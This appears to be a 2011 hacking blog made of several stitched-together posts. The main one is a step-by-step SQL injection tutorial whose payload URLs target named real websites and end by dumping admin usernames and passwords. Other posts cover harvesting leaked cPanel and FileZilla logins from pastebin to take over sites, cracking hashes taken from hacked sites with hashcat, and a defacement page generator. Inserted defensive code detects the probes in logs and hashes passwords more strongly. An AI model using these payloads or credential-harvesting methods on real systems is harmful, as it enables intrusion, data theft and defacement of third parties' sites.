Wednesday, September 14, 2011

SQL [TUT]

I have not included a tutorial for versions lower than 4 or for blind injection, because in my opinion more than 80% of SQL injections are done this way.

1. USE DORKS TO FIND SITES

http://f47al3rr0r.net/forum/showthread.php?tid=10

Credits : Biohazard

2.CHECK WHETHER THE SITE IS VULNERABLE

Put a ' in front of the page.

If it does not reload in its original format, it is vulnerable.

eg.

Nothing is shown on the page, so it might be vulnerable.

P.S.: If you get an error like this, it is not MySQL injection, it's MSSQL:


/ Microsoft Access ODBC driver /

/ Open quotation /

/ Microsoft Amos DB provider for Oracle /

/ Division by zero in /

so find a good MSSQL tutorial

3.FINDING NUMBER OF COLUMNS IN SQL DATABASE

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 1-- NO ERROR

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 10-- ERROR

SO COLUMN NUMBER IS BETWEEN 1 AND 10

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 5-- ERROR
SO COLUMN NUMBER IS BETWEEN 1 AND 5

http://www.pseb.org.pk/page.php?nid=11 ORDER BY 4-- NO ERROR
SO THE NUMBER OF COLUMNS IS 4


4:CHECK IF UNION STATEMENT IS WORKING AND FIND VULNERABLE COLUMNS

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT 1,2,3,4--

Watch out for the minus I placed before the web page number.
We do it so the website only returns the header and we can see useful information.
See the numbers it is showing on the page.
Those are the injectable column numbers.

5:CHECK DATABASE VERSION

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT @@version,2,3,4--

VERSION 5.0.83 cheers

6:FINDING TABLE NAMES

This sub-section is divided into two parts :

6A:WHEN ALL TABLE NAME IS SHOWED AT ONCE

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT table_name,2,3,4 from information_schema.tables--

In this case we will see which tables are interesting.
tblUsers intrigues me in this case.

6B:WHEN ONLY ONE TABLE NAME IS SHOWN, AND THAT TOO SOMETHING LIKE CHARACTER_SETS
Here we use limit statements.
Example: check this


http://www.medicalmarijuanainformation.c...roupID=-13 union select all table_name from information_schema.tables--


You will get the same problem here that I mentioned above.

So your way forward will be

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 0,1--


then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 1,1--

then

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 2,1--

till

http://www.medicalmarijuanainformation.c...roupID=-13 union all select table_name from information_schema.tables limit 17,1--

Use the magic quotes trick, along with limit, to find the column name.

7. FIND COLUMNS IN DATABASE
This sub-section is divided into two parts:

7A.FINDING COLUMNS IN A PARTICULAR TABLE

http://www.medicalmarijuanainformation.c...roupID=-13 union all select column_name from information_schema.columns where table_name='adminusers' limit 0,1--
Here only one column name is displayed, so I am using the limit statement; otherwise it would be unnecessary.
It only works if MAGIC QUOTES is off.
The single quotes I placed around the table name are important.
If it doesn't work, try hexing the table name.
Google a hex converter, put the table name in there, and get its hex.

7B.FINDING ALL COLUMN NAMES

http://www.pseb.org.pk/page.php?nid=-11 UNION ALL SELECT COLUMN_NAME,2,3,4 from information_schema.COLUMNS--


If only one column name is displayed, use the limit statement as shown above.

8.DISPLAYING USER NAMES AND PASSWORDS
0x3a is the hex form of ":".

http://www.medicalmarijuanainformation.c...roupID=-13 union all select group_concat(adminID,0x3a,adminUsername,0x3a,adminPassword) from adminusers --

http://www.pseb.org.pk/page.php?nid=-11 union all select concat(user_id,0x3a,password,0x3a,email),2,3,4 from tblUsers --


Cracking the hash, finding the hash type, finding the admin page, etc. are out of the scope of this tutorial.
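
From the defender's side, each step of the tutorial above leaves a recognizable query string in the web server's access log. The following is an added example, not part of the original post: it scans combined-format log lines for those step signatures and reports clients that progressed through several of them. The log lines, IP addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# One signature per tutorial step, in the order the steps reach the server.
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+\b")),
    ("union probe", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("version read", re.compile(r"@@version")),
    ("schema enumeration", re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("row paging", re.compile(r"\blimit\s+\d+\s*,\s*1\b")),
    ("data extraction", re.compile(r"\b(?:group_)?concat\s*\(.*0x3a")),
]
# Request target is taken up to " HTTP/" so raw, unencoded spaces still parse.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (.+?) HTTP/[\d.]+"')

# Constructed sample log (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Sep/2011:10:00:05 +0000] "GET /page.php?nid=11%20ORDER%20BY%2010-- HTTP/1.1" 200 312
203.0.113.7 - - [14/Sep/2011:10:00:09 +0000] "GET /page.php?nid=11 ORDER BY 4-- HTTP/1.1" 200 5120
203.0.113.7 - - [14/Sep/2011:10:00:20 +0000] "GET /page.php?nid=-11+UNION+ALL+SELECT+1,2,3,4-- HTTP/1.1" 200 900
203.0.113.7 - - [14/Sep/2011:10:00:41 +0000] "GET /page.php?nid=-11+UNION+ALL+SELECT+table_name,2,3,4+from+information_schema.tables-- HTTP/1.1" 200 2210
198.51.100.20 - - [14/Sep/2011:10:01:02 +0000] "GET /search.php?q=union+select+committee HTTP/1.1" 200 4800
198.51.100.20 - - [14/Sep/2011:10:01:30 +0000] "GET /list.php?sort=name&limit=10 HTTP/1.1" 200 100
"""

def stages_in(target):
    """Return the tutorial stages whose signature appears in a request target."""
    query = re.sub(r"\s+", " ", unquote_plus(urlsplit(target).query)).lower()
    return [name for name, rx in STAGES if rx.search(query)]

def scan(log_text):
    """Map each client IP to the distinct stages seen, in first-seen order."""
    seen = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        for stage in stages_in(m.group(2)) if m else []:
            stages = seen.setdefault(m.group(1), [])
            if stage not in stages:
                stages.append(stage)
    return seen

def suspects(log_text, min_stages=2):
    """Clients that progressed through several steps, not one stray keyword."""
    return {ip: s for ip, s in scan(log_text).items() if len(s) >= min_stages}

if __name__ == "__main__":
    for ip, stages in suspects(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

Access logs only record the query string, so the same probes sent in a POST body need application-level or WAF logging to be seen.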

Beginner friendly

I've been searching for days for the best way to get information for a few sites and FileZilla information, and I've found the easiest way to get most site(s) information.

In this tutorial I will share a way that I've got four websites for my team "Team Ownage", I will also give you the deface if wanted, I've got the following websites from this hacking way;
http://payingeveryday.com/
http://joomlachat.org
http://www.osninjas.info/
http://tonrak.net/

This way might have been released before but I've got the way of getting a 99.9% of a receiving information, I've found information for hundreds of things but this way does have complications, once this thread gets posted loads of users will be doing this so it'll be patched very quickly, I will be looking for way more ways of doing this with better websites.

Now let's get to the way of this lovely hack, go to http://pastebin.com, head over to the search button and search the following information from the list below;

"Cpanel Info"
"FileZilla Info"
"Minecraft Info"
"2083 info"
All of those give you a 99.9% of chance getting a website, it may take time getting a working website since loads of users might be doing this so don't expect it to work. Please don't use the "" only the information between it.

I hope this helps those users that cannot be asked to read the basics or are totally retarded(not mentioning anyone just saying), this took me around 3 days to get all the information and if you'll just take time to say thank you or even +rep me(if wanted, not asking don't need) I'll be grateful, I hope you all enjoy this.

GodMode Windows 7

It is very simple and useful. With it you can see all the applications which are important on Windows. Simply create a new folder and rename it to

Code:
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

How to crack a Hash

First, if you hack some website and get an encrypted admin password and you don't know what kind of password hash you have, I suggest you first read this thread: Hash Types - Must See. Then you will need a cracking program. I recommend hashcat. Hashcat is advanced password recovery software. It works on Windows as well as Linux, and it can crack hashes made with these algorithms:
Code:
MD5
    md5($pass.$salt)
    md5($salt.$pass)
    md5(md5($pass))
    md5(md5(md5($pass)))
    md5(md5($pass).$salt)
    md5(md5($salt).$pass)
    md5($salt.md5($pass))
    md5($salt.$pass.$salt)
    md5(md5($salt).md5($pass))
    md5(md5($pass).md5($salt))
    md5($salt.md5($salt.$pass))
    md5($salt.md5($pass.$salt))
    md5($username.0.$pass)
    md5(strtoupper(md5($pass)))
    SHA1
    sha1($pass.$salt)
    sha1($salt.$pass)
    sha1(sha1($pass))
    sha1(sha1(sha1($pass)))
    sha1(strtolower($username).$pass)
    MySQL
    MySQL4.1/MySQL5
    MD5(Wordpress)
    MD5(phpBB3)
    MD5(Unix)
    SHA-1(Base64)
    SSHA-1(Base64)
    SHA-1(Django)
    MD4
    NTLM
    Domain Cached Credentials
    MD5(Chap)
    MSSQL
    SHA256
    MD5(APR)
    SHA512
    SHA-512(Unix)

Download Link: Hashcat Advanced password recovery


The download is above, on the website. When you download and extract it, you will find two files: hashcat-gui32 and hashcat-gui64. Depending on whether your system is x64 or x86, you will choose between those. When you choose and open one of them, you will be asked what hardware device you would like to use. I recommend you use NVIDIA, but you can crack with the CPU too. It depends on your PC configuration. Now open a new document in Notepad, paste your hash and save it. Now go back to hashcat and follow the instructions by number:

[1] - Here you load your .txt file with your hash inside
[2] - Choose the mode to crack the password. You can use Tables or Combination but I think that Brute force is almost guaranteed.
[3] - Choose your hash type; again, if you don't know what it is, read this: Hash Types - Must See
[4] - Set the length of the password; here you must guess it. The bigger the password, the longer the cracking
[5] - What charset (words) will be used for the password. You can add your custom one if you want, like: !@#$%^&*()_+-ABCDEFG.....
[6] - Finally click start and cracking should begin. A new black command-prompt screen should appear, and that means that cracking is in progress. If you want, you can periodically press Enter to see the progress of the cracking.
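
The md5(...) and sha1(...) entries at the top of the algorithm list above are one or a few rounds of a fast digest, so each guess against them costs very little. The following added example, not part of the original post, stores passwords with salted PBKDF2-HMAC-SHA256 and upgrades a legacy md5($pass.$salt) record at the next successful login; the record format, function names and iteration count are assumptions made for illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed work factor; tune to your own latency budget

def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a 'pbkdf2_sha256$iterations$salt_hex$digest_hex' record."""
    salt = salt or os.urandom(16)  # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def legacy_md5(password, salt):
    """The md5($pass.$salt) layout from the list above: a single fast round."""
    return hashlib.md5((password + salt).encode()).hexdigest()

def verify_and_upgrade(password, record):
    """Return (ok, new_record); new_record is set when the row should be rewritten."""
    scheme, *parts = record.split("$")
    if scheme == "md5" and len(parts) == 2:  # hypothetical legacy row: md5$salt$hex
        salt, digest = parts
        ok = hmac.compare_digest(legacy_md5(password, salt), digest)
        return ok, (hash_password(password) if ok else None)
    if scheme == "pbkdf2_sha256" and len(parts) == 3:
        iterations, salt = int(parts[0]), bytes.fromhex(parts[1])
        ok = hmac.compare_digest(hash_password(password, salt, iterations), record)
        stale = ok and iterations < ITERATIONS  # stored with a weaker work factor
        return ok, (hash_password(password) if stale else None)
    return False, None  # unknown scheme or wrong field count: reject

if __name__ == "__main__":
    old = "md5$s4lt$" + legacy_md5("correct horse", "s4lt")  # constructed record
    ok, new = verify_and_upgrade("correct horse", old)
    print(ok, new)
```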

Sunday, August 28, 2011

Deface Page Generator



A cool little program that will make the deface page for you; you just enter the text you want.

For an example of how it looks visit:

http://www.hakforums.net/deface.html

Download:

http://www.2shared.com/file/1fDDaO0_/Def...e_Gen.html